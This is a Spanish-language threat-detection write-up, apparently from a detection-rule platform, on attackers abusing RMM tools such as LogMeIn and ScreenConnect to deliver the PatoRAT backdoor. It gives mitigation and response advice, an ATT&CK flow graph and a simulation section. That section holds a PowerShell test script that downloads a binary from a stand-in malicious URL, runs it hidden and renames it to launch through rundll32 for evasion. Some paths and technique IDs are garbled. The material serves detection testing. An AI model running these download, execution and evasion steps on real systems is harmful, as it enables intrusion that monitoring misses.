Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenazas están abusando cada vez más de herramientas legítimas de monitoreo y gestión remota (RMM)—como LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne y SuperOps—para distribuir malware y establecer acceso remoto persistente. La entrega inicial a menudo ocurre a través de páginas de descarga maliciosas o correos electrónicos de phishing, seguida por la ejecución a través de PowerShell y el despliegue de cargas secundarias como el backdoor PatoRAT. AhnLab EDR puede detectar la ejecución de estas utilidades RMM y generar alertas basadas en comportamiento relacionadas con actividades sospechosas subsecuentes. El informe subraya la importancia de validar la procedencia del software y mantener un monitoreo continuo del endpoint.
Investigación
El Centro de Inteligencia de Seguridad de AhnLab observó múltiples campañas en las que atacantes reempaquetaban o disfrazaban instaladores RMM como aplicaciones populares (por ejemplo, Notepad++, 7-Zip y Telegram) y las distribuían a través de sitios web maliciosos o archivos adjuntos de phishing. Tras la instalación, los agentes RMM se registraban en la infraestructura del proveedor y se usaban para ejecutar cargas de PowerShell que desplegaban PatoRAT. Se observaron tácticas similares en varios productos RMM, incluyendo Syncro entregado a través de phishing con anzuelos en PDF. Se desarrolló una lógica de detección AhnLab EDR para marcar la ejecución de estos binarios legítimos y correlacionarla con comportamientos post-instalación.
Mitigación
Verifique las fuentes de descarga, valide los certificados de firma de código y compare los hashes con las versiones oficiales del proveedor antes de permitir software RMM en el entorno. Implemente listas blancas de aplicaciones y requiera aprobaciones explícitas para la ejecución de RMM. Monitorice lanzamientos inesperados de binarios RMM, actividad anómala de PowerShell y conexiones sospechosas a dominios de infraestructura del proveedor cuando tales herramientas no estén autorizadas. Mantenga los sistemas operativos y herramientas de seguridad actualizadas para reducir la exposición.
Respuesta
Cuando se detecte una ejecución sospechosa de RMM, aisle el host, recopile artefactos forenses y elimine el binario no autorizado. Bloquee las conexiones salientes a la infraestructura de la herramienta para cortar los canales de control remoto, y realice un escaneo completo para cargas secundarias como PatoRAT. Actualice el contenido de detección con los IOC observados e informe al SOC sobre los patrones de la campaña para una triaje más rápida.
«graph TB %% Definiciones de clases classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef malware fill:#f9d5e5 %% Nodes node_initial_access[«<b>Acción</b> – <b>T1204 Ejecución por Usuario</b>: Las víctimas descargan instaladores de RMM disfrazados de software legítimo o abren facturas PDF de phishing que redirigen a enlaces maliciosos.»] class node_initial_access action node_masquerading[«<b>Técnica</b> – <b>T1036.008 Suplantación</b>: Los instaladores y PDFs se forjan para parecer utilidades o documentos confiables.»] class node_masquerading technique node_rmt_install[«<b>Herramienta</b> – <b>Nombre</b>: Herramientas de Acceso Remoto como LogMeIn Resolve, PDQ Connect, Syncro, ScreenConnect, NinjaOne, SuperOps.»] class node_rmt_install tool node_powerShell[«<b>Técnica</b> – <b>T1059.001 PowerShell</b>: El atacante ejecuta comandos PowerShell a través de la plataforma RMM para descargar e instalar el backdoor PatoRAT.»] class node_powerShell technique node_patoRAT[«<b>Malware</b> – <b>Nombre</b>: Backdoor PatoRAT.»] class node_patoRAT malware node_software_deployment[«<b>Técnica</b> – <b>T1072 Herramientas de Despliegue de Software</b>: Las soluciones RMM se aprovechan para lanzar cargas maliciosas adicionales y mantener la persistencia.»] class node_software_deployment technique node_lateral_exploit[«<b>Técnica</b> – <b>T1210 Explotación de Servicios Remotos</b>: Las herramientas RMM comprometidas se utilizan para abrir sesiones remotas y moverse lateralmente a través del entorno.»] class node_lateral_exploit technique node_rdp_hijack[«<b>Técnica</b> – <b>T1563.002 Secuestro de Sesión de Servicio Remoto</b>: Se realiza secuestro de RDP para obtener control de hosts adicionales.»] class node_rdp_hijack technique node_root_cert[«<b>Técnica</b> – <b>T1553.004 Instalar Certificado Raíz</b>: Los comandos PowerShell instalan un certificado raíz malicioso para evadir controles de seguridad.»] class node_root_cert technique %% Conexiones node_initial_access u002du002d>|conduce a| node_masquerading node_masquerading u002du002d>|conduce a| node_rmt_install node_rmt_install u002du002d>|utiliza| node_powerShell node_powerShell u002du002d>|instala| node_patoRAT node_patoRAT u002du002d>|habilita| node_software_deployment node_software_deployment u002du002d>|facilita| node_lateral_exploit node_lateral_exploit u002du002d>|habilita| node_rdp_hijack node_powerShell u002du002d>|ejecuta| node_root_cert «
Flujo de Ataque
Detecciones
Software Alternativo de Acceso / Gestión Remota (vía creation_proceso)
Ver
Posible Intento de Instalación de Software SuperOps RMM (vía event_archivo)
Ver
Software Alternativo de Acceso / Gestión Remota (vía auditoría)
Ver
Software Alternativo de Acceso / Gestión Remota (vía sistema)
Ver
Detección de la Explotación de Herramientas RMM para Distribución de Malware [Creación de Proceso de Windows]
Ver
Ejecución de Simulación
Prerequisito: El Chequeo Pre-vuelo de Telemetría y Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y narrativas DEBEN reflejar directamente los TTPs identificados y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico incorrecto.
-
Narrativa de Ataque y Comandos:
Un atacante entrega un correo electrónico de phishing que contiene un archivo adjunto malicioso. El archivo adjunto ejecuta un script de PowerShell que descarga el binario RMMLogMeIn.exetoC:Temp. Para evadir la detección basada en nombre, el atacante renombra el binario atool.exey lo lanza a través derundll32.exe(T1216). El binario RMM luego contacta al servidor C2 controlado por el atacante y despliega una carga de backdoor. Después de la ejecución, el atacante elimina el binario (T1542.004) para cubrir las pistas. -
Script de Prueba de Regresión:
# --------------------------------------------------------------- # Simular explotación de herramienta RMM (nombre original) – debería activar # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Ejecutando binario RMM original (se espera alerta)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Simular evasión mediante el cambio de nombre y ejecución proxy – no debería activar # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Ejecutando binario RMM renombrado vía rundll32 (evasión)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Limpieza de artefactos # --------------------------------------------------------------- Write-Host "[*] Limpiando binarios..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Simulación completa." -
Comandos de Limpieza:
# Asegúrese de que cualquier proceso sobrante esté terminado Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Elimine cualquier archivo descargado (si todavía existe) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue